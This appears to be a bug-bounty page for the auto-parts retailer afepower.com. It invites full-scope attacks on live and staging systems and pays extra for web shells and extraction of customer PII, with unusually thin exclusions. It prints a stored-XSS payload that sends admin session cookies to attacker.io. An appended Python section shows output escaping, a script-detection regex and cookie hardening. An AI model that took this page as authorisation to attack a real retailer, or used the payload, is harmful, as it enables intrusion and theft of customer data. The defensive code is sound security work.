01 — Overview

E-commerce surfaces worth pressure-testing

AFE Power is a US-based e-commerce platform selling high-performance automotive parts, air intake systems, exhaust components, and tuning accessories at afepower.com. The site handles customer accounts, order fulfillment, payment processing, admin dashboards, CMS product management, and file upload workflows for product imagery and technical documents — fertile ground for admin access escalation, shell/RCE, XSS-to-file-upload chains, and database extraction if any boundary slips.

In scope materially: every HTTP(S) origin answering for afepower.com and delegated subdomains, admin and staff portals, CMS and product management interfaces, customer database and order records, checkout and payment processing flows, file upload endpoints, API integrations with shipping and payment providers, staging or preview environments.
Civil exclusions only: mass harassment, ransomware against unrelated third parties, laundering.

Minimum evidence bar — non-negotiable:
  1. Narrative kill chain tying root cause → exploit steps → observable impact
  2. Proof the attack succeeds (replayable scripts, fixture logs, Burp/HAR with matched responses).

02 — Why this matters

Why probe AFE Power?

Flat $5K critical payouts

Validated critical exploits with reproducible payloads earn exactly $5,000 USD.

Admin access blast radius

Admin and staff portals control product listings, customer data, order fulfilment, and pricing. A single foothold cascades into full store takeover.

File upload & XSS chains

Product images and technical document uploads are common vectors. XSS-to-file-upload chains open direct paths to shell access.

03 — Critical reward

$5,000 per validated critical

Critical: $5,000 USD

One flat tier. Every critical submission that meets the evidence bar pays $5,000. Multiple criticals from the same researcher are paid independently.

Special bounty uplift: A working shell/RCE chain that escalates to database extraction of customer PII qualifies for $10,000+ special bounty.

04 — Scope

What's in scope

Everything AFE Power operates at afepower.com and its subdomains.

  • Admin and staff backoffice panels — authentication bypass, privilege escalation
  • File upload endpoints — unrestricted upload, path traversal, web shell deployment
  • XSS vectors — stored, reflected, DOM-based XSS chaining to session theft
  • Shell/RCE — command injection, template injection, SSRF-to-RCE
  • Customer database — SQL injection, direct data extraction of PII and order records
  • Checkout and payment flows — price manipulation, order tampering
  • CMS and product management — content injection, media library abuse
  • API endpoints — REST and GraphQL surfaces, authentication flaws, IDOR
  • Staging / dev environments — subdomains prefixed dev-, staging-, test-

05 — Full-scope policy

No discretionary carve-outs

Every endpoint, parameter, file upload handler, and admin interface AFE Power runs is eligible when a critical impact is reproducible.

  • Every hostname routing through AFE Power edge
  • Third-party integrations (shipping calculators, payment iframes) when the vulnerability originates from AFE Power's implementation
  • Edge caches or CDN config that can be abused for web shell delivery
  • Admin subdomains — admin, dashboard, backoffice

Legal floor: harassment, ransomware, laundering — still barred.

06 — Rules

Rules of engagement

  1. Prove exploitation success. Ship replayable artefacts: curl flows, Burp/HAR exports, web shell access logs.
  2. Articulate kill chain. Number each hop: initial vector → privilege escalation → admin access → data exfiltration.
  3. Document blast radius. Quantify users or records affected.
  4. Encrypt & ship privately. Use sanctioned intake before broadcasting details.
  5. Duplicate fairness. First fully qualifying chain wins.

07 — Submit

How to submit a report

Start from the security / disclosure contact on afepower.com. The mandatory report sections are mirrored in the template below.

Report Template
# Title
[Critical][Exploit-Proven] <tight title>
## Attack chain narrative
1. Preconditions
2. Entry primitive — exact HTTP verb/path/query/body
3. Pivot(s) chaining trust escalation
4. Final hop → admin access / data exfiltration / shell
## Successful exploitation evidence
• Replayable script + truncated responses
• HAR / Burp with unauthorized state change
## Reproduction package
Commands + fixtures + pinned SHAs

08 — Example

Admin session leak via stored XSS

Stored XSS in product review form — the script captures the admin's session cookie when they moderate reviews.

JavaScript · illustrative payload
// Stored in product review — fires when admin views pending reviews
<script>
var img = new Image();
img.src = 'https://attacker.io/steal?c=' + document.cookie;
</script>
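
As an added defender-side example (not part of this program page), the controls that make the payload above inert: HTML-escaping review text at render time so the stored markup never becomes a live script element, a moderation-side pattern check for flagging suspicious submissions, and an HttpOnly/Secure/SameSite admin session cookie that document.cookie cannot read. All function names and the sample review text are constructed for illustration.

```python
import html
import re
from http.cookies import SimpleCookie

# Constructed sample: the illustrative stored-XSS payload from the example above,
# as it would sit in the reviews table after an unfiltered submission.
SAMPLE_REVIEW = (
    "<script>var img = new Image();"
    "img.src = 'https://attacker.io/steal?c=' + document.cookie;</script>"
)


def render_review_html(body: str) -> str:
    """Context-aware output encoding for untrusted review text placed in an
    HTML element body: <, >, &, and quotes are escaped, so the browser shows
    the text literally instead of executing a <script> element."""
    return '<p class="review">' + html.escape(body, quote=True) + "</p>"


# Markup that has no business in a product review; used for moderation triage,
# not as the security control (escaping on output is the control).
SCRIPT_RE = re.compile(r"<\s*script\b|javascript:|\bon\w+\s*=", re.IGNORECASE)


def looks_like_script_payload(body: str) -> bool:
    """Flag a submission for moderator attention when it carries script-like markup."""
    return bool(SCRIPT_RE.search(body))


def admin_session_cookie(session_id: str) -> str:
    """Build the Set-Cookie value for the staff session. HttpOnly keeps it out of
    document.cookie, so even an executing payload could not read it; Secure and
    SameSite=Strict limit transport and cross-site replay."""
    jar = SimpleCookie()
    jar["admin_session"] = session_id
    jar["admin_session"]["httponly"] = True
    jar["admin_session"]["secure"] = True
    jar["admin_session"]["samesite"] = "Strict"
    jar["admin_session"]["path"] = "/admin"
    return jar.output(header="").strip()


def cookie_is_hardened(set_cookie_value: str) -> bool:
    """Audit check: does a Set-Cookie value carry the flags that blunt cookie theft?"""
    attrs = {a.strip().lower() for a in set_cookie_value.split(";")[1:]}
    has_samesite = any(a.startswith("samesite=") for a in attrs)
    return "httponly" in attrs and "secure" in attrs and has_samesite
```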

09 — FAQ

Frequently asked questions

Out of scope besides illegal stuff?

No discretionary carve-outs — only universal legal/ethical lines.

Do write-ups without a working exploit get paid?

No. Both narrative and evidence required.

Staging environments fair game?

Yes, when AFE Power labels or operates them.

Duplicates?

First validated chain + reproducible exploitation wins.

Lower severities rewarded?

Not under this $5K-flat critical playbook.

Critical chain + working exploit = $5,000

Document the attack, prove it lands, file privately.